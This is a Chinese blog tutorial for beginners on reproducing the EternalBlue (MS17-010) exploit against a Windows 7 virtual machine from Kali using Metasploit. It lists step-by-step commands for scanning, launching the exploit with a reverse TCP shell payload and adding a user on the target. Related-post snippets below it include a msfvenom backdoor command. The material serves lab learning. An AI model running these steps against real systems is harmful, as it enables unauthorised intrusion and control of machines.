kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南

已于 2023-12-19 20:12:01 修改
阅读量1.2w 收藏 114
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全
于 2022-04-18 19:30:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45596770/article/details/124256360
版权

首先开篇先放出我使用的kali 与 win7 的网盘链接:

链接: https://pan.baidu.com/s/1tvrj41wLRY4ZTfJG8mDwVA?pwd=v6e4

提取码: v6e4

大家VMware上新建虚拟机即可~

简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~

1. Metasploit初始化

在使用之前我们需要对Metasploit进行初始化,并启动:

终端窗口的命令行输入如下命令

systemctl start postgresql
systemctl enable postgresql

启动专用的数据库,并设置为每次开机自动启动

msfconsole

或者 点击kali屏幕左上角图标->选择 08->点击Metasploit framework

(P.S. msf == Metasploit framework

2. Metasploit常用命令

search
  • 按关键字查找
use
  • 选择对应模块并使用
    (P.S. <1>在use 中想退出模块不退出框架使用 back命令;<2> 也可以使用info 查看使用模块的详细信息
show options
  • 查看该模块需要配置的参数
run
  • 运行模块

事实上,msf的使用法则三步走

  1. 查找对应可使用模块;
  2. 使用模块并配置模块必选项;
  3. 运行模块。

msf中共有6大模块,分别是:

  1. 渗透攻击模块Exploit Modules:攻击漏洞
  2. 辅助模块Auxiliary Modules:扫描
  3. 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
  4. 空字段模块Nop Modules
  5. 编码模块Encoders
  6. 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

在本次实验中,我们主要使用123.

3.永恒之蓝复现过程

3.1准备工作
首先确定两台虚拟机kali与win7在同一网段内,同时win7防火墙已关闭
P.S.kali 使用 ifconfig 查看 ip,win7 使用 ipconfig 查看ip

  • 其中我的win7 ip 为 192.168.31.73

P.S.win7防火墙关闭:

  1. 选择左下角“开始”图标,
  2. 点击“控制面板”,
  3. 选择“系统与安全”,
  4. 点击“windows防火墙”,
  5. 左列选择“打开或关闭防火墙”

3.2扫描是否有可用漏洞

P.S.永恒之蓝(MS17_010)

search ms17_010

先搜索查找可用模块
在这里插入图片描述

use auxiliary/scanner/smb/smb_ms17_010

use 调用Aux扫描模块(借此查看目标主机是否有漏洞
在这里插入图片描述

show options

使用该命令查看需要配置的参数,Required == yes 且 Current Setting 为空的值是我们需要配置。
在这里插入图片描述

set rhost 192.168.31.73

设置上文所需的rhost参数
在这里插入图片描述

run

出现+号表示可以入侵
在这里插入图片描述

3.3渗透

use exploit/windows/smb/ms17_010_eternalblue
show options
set 192.168.31.73

P.S.和扫描有异曲同工之处

use 调用Exploits模块(该模块也是search中搜索出的),并查看需配置的参数,并设置参数
在这里插入图片描述

在这里插入图片描述

show payloads 
set payload windows/x64/shell/reverse_tcp
run

查看可使用的攻击载荷并设置,最后运行该模块
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里可以看见我们拿到win7的shell的,但是会出现乱码,解决乱码的情况

chcp 65001

在这里插入图片描述
3.4测试

在kali上干一些对win7有影响的事吧!比如在这里我是添加了一个faker用户
在这里插入图片描述
回到win7发现确定增加了该用户~

3.5保存该次进程于后台,并再次打开

background

进程放至后台

sessions -l

展示后台进程

sessions -i 2

再次打开该进程
在这里插入图片描述

哈哈哈oo4
关注
  • 13
    点赞
  • 114
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
kali上利用metasploit工具对windows7系统进行渗透测试实验
qq_54727885的博客
04-10 381
本实验使用metasploit工具通过“永恒之蓝”漏洞攻击windows系统,从而拿到windows的操作权限
渗透基础笔记+作业(永恒之蓝复现
09-08
MS17-010,也称为“永恒之蓝”,是一个著名的漏洞,主要影响Windows操作系统,尤其是Windows 7。复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架...
kali机利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 823
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用的漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用的漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击。
利用永恒之蓝漏洞(ms17-010)对win7上传勒索病
m0_74402888的博客
04-27 948
攻击机kali:192.168.83.136靶机win7:192.168.83.144。
Kali渗透Windows服务器
最新发布
程序员阿飘 的博客
05-17 758
如果你也想学习:黑客&网络安全的零基础攻防教程本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;1、 实战步骤一:生成setup.exe后门程序,即木马程序。(1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。
永恒之蓝(ms17-010)复现win7与win server2008 R2渗透
Lzcsfg的博客
04-10 1454
在虚拟机中安装关闭win7与win2008的防火墙,并正常有ip地址。本文对两种windows进行攻击测试,可以选用安装一个windows即可原理:永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的网络攻击工具,它利用了Windows操作系统中的一个漏洞,该漏洞被标记为MS17-010。这个漏洞影响了微软的SMB协议(Server Message Block),该协议通常用于在本地网络中共享文件、打印机和其他资源。
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3866
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
Kali环境下渗透目标(win7)虚拟机
qq_50660123的博客
11-27 3529
Kali环境下渗透目标(win7)虚拟机 注:(此文章,是我看了CSDN上另一位博主的文章,我在自己在电脑上实验了一遍的结果。另外,本文仅供学习交流。用来做非法之事,本人概不负责) 准备: 1,在电脑上安装VMware,并下载安装虚拟机kali;虚拟机Windows7 2,要使两台虚拟机相互之间能ping通。在两台机子都被启动以后,在其中一台电脑的终端命令界面,输入 ping (另一虚拟机ip地址)。 如果无法ping通,点击菜单栏里的编辑,在下拉列表中点击‘虚拟网络编辑器‘。查看两虚拟机是否在同一网卡内,
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2793
MSF渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
KALIMSF使用
Linux_get的博客
03-11 1000
记录学习一次Linux
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1749
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
绕过防火墙的攻击手段及其防护技术_吴海燕.pdf
09-09
该文章主要讲述的是如何绕过防火墙的限制,其中介绍了一些攻击手段和防护的技术,对防火墙感兴趣的小伙伴可以好好读一下。
永恒之蓝测试.docx
07-23
"Kali 永恒之蓝测试指南" 在这篇文章中,我们将详细介绍 Kali Linux 中的永恒之蓝测试步骤,适合新手观看。永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,...
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
kali 渗透msf
11-14
kali渗透测试利器
网络安全:kaliMSF工具基本使用方法
Mr_qing的博客
10-08 5103
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
利用kaliwin7实现同网段永恒之蓝漏洞复现
Y525698136的博客
03-02 1237
利用kaliwin7实现同网段永恒之蓝漏洞复现
kali linux渗透win11操作系统
2301_78519654的博客
12-27 671
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=8888 -f exe -o win10.exe。第7步设置IP和端口号{端口号用你刚刚生成文件的那个端口号} {IP用你刚用ifconfig这个命令查出来的}我的是172.19.215.206。第3步在左边的终端输入以下命令并回车。第5步 在左边的输入一下命令并回车。第6步 在左边的输入一下命令并回车。第4步在左边的输入一下命令并回车。在右边的终端输入以下命令并回车。
kali永恒之蓝漏洞渗透
09-05
永恒之蓝是指微软Windows操作系统中的一个漏洞,也被称为ms17-010漏洞。通过利用永恒之蓝漏洞,黑客可以在目标机器上执行远程代码,获得对系统的控制权。在Kali Linux中,可以使用一些工具来进行永恒之蓝漏洞的渗透测试。 首先,使用auxiliary/scanner/smb/smb_ms17_010模块进行扫描目标主机,以确定是否存在漏洞。如果扫描结果显示存在漏洞,可以进一步使用exploit/windows/smb/ms17_010_eternalblue模块进行渗透。这个模块可以利用永恒之蓝漏洞远程执行代码,获取目标主机的shell。 在Kali Linux中,可以使用search命令来搜索有关永恒之蓝漏洞的可利用部分。具体来说,可以使用search ms17-010命令来搜索与ms17-010漏洞相关的可利用模块或脚本。 需要注意的是,在进行任何渗透测试之前,请确保您已获得合法的授权,并且仅在合法范围内使用这些工具和技术。任何未经授权的渗透测试活动都是非法的。 总结起来,Kali Linux中可以使用smb_ms17_010和ms17_010_eternalblue工具来扫描和渗透永恒之蓝漏洞。使用search命令可以搜索与该漏洞相关的可利用部分。在进行任何渗透测试之前,请确保遵守法律法规并获得合法授权。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [通过Kali利用永恒之蓝漏洞目标主机shell,并进行部分后渗透操作](https://blog.csdn.net/weixin_60182338/article/details/129622710)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [网络安全实战(三)Kali Linux渗透测试(永恒之蓝 MS17-010漏洞复现)](https://blog.csdn.net/weixin_42474227/article/details/122237494)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值